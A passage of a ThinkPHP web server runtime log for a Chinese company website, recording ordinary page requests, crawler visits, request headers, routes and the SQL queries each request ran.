'index', 1 => 'product', 2 => 'cpxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/product/cpxq/id/146_html' => '', 'id' => '146', ) [ info ] [ RUN ] app\index\controller\Product->cpxq[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\cpxq.htm [ array ( 0 => 'res', 1 => 'photoRes', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `p` INNER JOIN `type` `t` ON `p`.`type_id`=`t`.`id` WHERE `p`.`id` = '146' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `goods_photo` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `goods_photo` WHERE `goods_id` = 146 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T01:44:33+08:00 ] 220.249.46.94 GET / [ info ] www.kinsana.cn/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,016.83kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.sogou.com/web?query=site%3Awww.kinsana.cn', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36', 'upgrade-insecure-requests' => '1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T01:44:34+08:00 ] 220.249.46.94 GET /ajaxArea.php?id=1000139 [ info ] www.kinsana.cn/ajaxArea.php?id=1000139 [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,069.88kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'ajaxArea.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36', 'cookie' => 'safedog-flow-item=', 'accept' => '*/*', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/ajaxArea_php' => '', 'id' => '1000139', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T01:44:34+08:00 ] 220.249.46.94 POST /index/index/proapi.html [ info ] www.kinsana.cn/index/index/proapi.html [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,904.47kb] [文件加载:49] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'index', 2 => 'proapi', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36', 'origin' => 'http://www.kinsana.cn', 'cookie' => 'safedog-flow-item=', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'content-length' => '7', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/index/proapi_html' => '', 'cates' => '5', ) [ info ] [ RUN ] app\index\controller\Index->proapi[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`cate_id`,`sm_img`,`name`,`pro_name`,`sp` FROM `product` WHERE `cate_id` = 5 AND `is_top` = 1 AND `state` = 1 ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 4 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T01:50:54+08:00 ] 203.208.60.119 POST /api/index/procontent [ info ] www.kinsana.cn/api/index/procontent [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,741.90kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'procontent', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate, br', 'user-agent' => 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'from' => 'googlebot(at)googlebot.com', 'accept' => '*/*', 'connection' => 'close', 'content-length' => '5', 'x-requested-with' => 'XMLHttpRequest', 'referer' => 'http://www.kinsana.cn/m/cpxq.html?id=75', 'origin' => 'http://www.kinsana.cn', 'cookie' => 'safedog-flow-item=', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-language' => 'en-US', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/procontent' => '', 'id' => '75', ) [ info ] [ RUN ] app\api\controller\Index->procontent[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `a` INNER JOIN `type` `c` ON `a`.`type_id`=`c`.`id` WHERE `a`.`id` = '75' LIMIT 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T02:24:19+08:00 ] 112.5.37.139 GET / [ info ] www.kinsana.cn/ [运行时间:0.156250s][吞吐率:6.40req/s] [内存消耗:2,016.00kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T02:24:42+08:00 ] 203.208.60.119 GET /index/product/zycp.html [ info ] www.kinsana.cn/index/product/zycp.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,106.89kb] [文件加载:56] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'zycp', ), ) [ info ] [ HEADER ] array ( 'if-modified-since' => 'Thu, 15 Jul 2021 01:54:40 GMT', 'accept-encoding' => 'gzip, deflate, br', 'user-agent' => 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'from' => 'googlebot(at)googlebot.com', 'accept' => 'text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8', 'connection' => 'close', 'amp-cache-transform' => 'google;v="1..7"', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/product/zycp_html' => '', ) [ info ] [ RUN ] app\index\controller\Product->zycp[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\zycp.htm [ array ( 0 => 'res', 1 => 'page', 2 => 'types', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `product` WHERE `cate_id` = 2 AND `state` = 1 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`cate_id`,`type_id`,`name`,`pro_name`,`sp`,`sm_img` FROM `product` WHERE `cate_id` = 2 AND `state` = 1 ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 0,9 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 2 AND `state` = 1 GROUP BY `type_id` [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (1) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T02:25:55+08:00 ] 220.249.46.150 GET /index/news/xwxq/id/181.html [ info ] www.kinsana.cn/index/news/xwxq/id/181.html [运行时间:0.171875s][吞吐率:5.82req/s] [内存消耗:2,174.42kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36', 'upgrade-insecure-requests' => '1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/181_html' => '', 'id' => '181', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 181 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 181 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T03:02:14+08:00 ] 34.77.162.15 GET / [ info ] xn--vhqsn14am88k.com/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,016.19kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T03:06:19+08:00 ] 185.191.171.1 GET /index/news/xwxq/id/179.html [ info ] xn--vhqsn14am88k.com/index/news/xwxq/id/179.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,172.65kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)', 'connection' => 'close', 'accept-encoding' => 'gzip,deflate', 'accept' => 'text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml, application/xhtml+xml', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/179_html' => '', 'id' => '179', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 179 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 179 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T03:25:30+08:00 ] 106.11.159.49 GET /index/news/xwxq/id/232.html [ info ] www.kinsana.cn/index/news/xwxq/id/232.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,170.19kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/232_html' => '', 'id' => '232', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 232 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 232 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T03:30:14+08:00 ] 183.228.201.154 GET /index/news/xwxq/id/152.html [ info ] www.kinsana.cn/index/news/xwxq/id/152.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,174.53kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'accept-language' => 'zh,zh-CN;q=0.9', 'user-agent' => 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.5898.1171 Mobile Safari/537.36', 'upgrade-insecure-requests' => '1', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/152_html' => '', 'id' => '152', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 152 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 152 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T03:38:49+08:00 ] 112.5.37.103 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,016.00kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T03:40:56+08:00 ] 112.47.58.43 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,016.00kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T03:49:00+08:00 ] 106.38.241.167 GET /index/news/xwxq/id/114.html [ info ] www.kinsana.cn/index/news/xwxq/id/114.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,167.66kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/114_html' => '', 'id' => '114', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 